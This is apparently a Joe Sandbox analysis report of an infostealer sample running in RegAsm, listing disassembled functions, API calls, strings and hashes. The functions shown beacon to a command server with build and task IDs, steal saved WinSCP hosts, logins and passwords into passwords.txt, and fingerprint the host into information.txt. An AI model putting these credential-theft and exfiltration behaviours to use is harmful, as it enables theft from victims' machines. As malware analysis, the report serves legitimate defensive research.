InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

", xrefs: 0040721D
task_id, xrefs: 00407351
------, xrefs: 00406E82
", xrefs: 0040737D
------, xrefs: 0040729F
------, xrefs: 004073FF
", xrefs: 004074DD
", xrefs: 00406F61
build_id, xrefs: 00407095
6c8ce6f422a1d9cf34f23d1c2168e754, xrefs: 004070ED
", xrefs: 004070C1
mode, xrefs: 004071F1
------, xrefs: 00406FE3
status, xrefs: 004074B1
------, xrefs: 00407145
------, xrefs: 00406CFC

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$6c8ce6f422a1d9cf34f23d1c2168e754$build_id$mode$status$task_id
API String ID: 3702379033-307093860
Opcode ID: 293a18129fa7615b48df291ab53d5a2a956bdc0216faeee70b68bc5b0b036c50
Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
Opcode Fuzzy Hash: 293a18129fa7615b48df291ab53d5a2a956bdc0216faeee70b68bc5b0b036c50
Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8

Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,6c8ce6f422a1d9cf34f23d1c2168e754,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

------, xrefs: 00406206
6c8ce6f422a1d9cf34f23d1c2168e754, xrefs: 00406471
------, xrefs: 004064C9
", xrefs: 004062E5
", xrefs: 00406445
------, xrefs: 00406080
------, xrefs: 00406367
build_id, xrefs: 00406419
mode, xrefs: 00406575
", xrefs: 004065A1

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$6c8ce6f422a1d9cf34f23d1c2168e754$build_id$mode
API String ID: 3702379033-4181873486
Opcode ID: 01e41bab29020057977b5875c426518cc7d1618c45e0f03a21d56cb97033aecb
Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
Opcode Fuzzy Hash: 01e41bab29020057977b5875c426518cc7d1618c45e0f03a21d56cb97033aecb
Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
Host: , xrefs: 0040E32A
PortNumber, xrefs: 0040E3BD
Password: , xrefs: 0040E529
Security, xrefs: 0040E253
HostName, xrefs: 0040E367
Login: , xrefs: 0040E459
UseMasterPassword, xrefs: 0040E24E
:22, xrefs: 0040E42D
UserName, xrefs: 0040E496
Soft: WinSCP, xrefs: 0040E2FE
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
passwords.txt, xrefs: 0040E662
Password, xrefs: 0040E515

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 3303087153-2798830873
Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00418684
GetProcAddress.KERNEL32 ref: 0041869B
GetProcAddress.KERNEL32 ref: 004186B2
GetProcAddress.KERNEL32 ref: 004186C9
GetProcAddress.KERNEL32 ref: 004186E0
GetProcAddress.KERNEL32 ref: 004186F7
GetProcAddress.KERNEL32 ref: 0041870E
GetProcAddress.KERNEL32 ref: 00418725
GetProcAddress.KERNEL32 ref: 0041873C
GetProcAddress.KERNEL32 ref: 00418753
GetProcAddress.KERNEL32 ref: 0041876A
GetProcAddress.KERNEL32 ref: 00418781
GetProcAddress.KERNEL32 ref: 00418798
GetProcAddress.KERNEL32 ref: 004187AF
GetProcAddress.KERNEL32 ref: 004187C6
GetProcAddress.KERNEL32 ref: 004187DD
GetProcAddress.KERNEL32 ref: 004187F4
GetProcAddress.KERNEL32 ref: 0041880B
GetProcAddress.KERNEL32 ref: 00418822
GetProcAddress.KERNEL32 ref: 00418839
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
GetProcAddress.KERNEL32(75070000,004184C2), ref: 004188AA
GetProcAddress.KERNEL32(75FD0000,004184C2), ref: 004188C5
GetProcAddress.KERNEL32 ref: 004188DC
GetProcAddress.KERNEL32(75A50000,004184C2), ref: 004188F7
GetProcAddress.KERNEL32(74E50000,004184C2), ref: 00418912
GetProcAddress.KERNEL32(76E80000,004184C2), ref: 0041892D
GetProcAddress.KERNEL32 ref: 00418944

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55

Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Work Dir: In memory, xrefs: 00413E30
Windows: , xrefs: 00413E70
[Processes], xrefs: 0041442A
Date: , xrefs: 00413C1F
HWID: , xrefs: 00413D4E
Keyboard Languages: , xrefs: 004140DE
Install Date: , xrefs: 00413ED1
Display Resolution: , xrefs: 0041406F
Threads: , xrefs: 004142EF
RAM: , xrefs: 00414350
MachineID: , xrefs: 00413C80
AV: , xrefs: 00413F3E
TimeZone: , xrefs: 004141AC
GUID: , xrefs: 00413CE1
VideoCard: , xrefs: 004143B7
Processor: , xrefs: 0041422D
Path: , xrefs: 00413DBB
User Name: , xrefs: 0041400E
Version: , xrefs: 00413B9F
information.txt, xrefs: 00414573
Computer Name: , xrefs: 00413FAD
Local Time: , xrefs: 0041414B
[Software], xrefs: 004144A3
[Hardware], xrefs: 0041420D
Cores: , xrefs: 0041428E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 3279995179-1014693891
Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
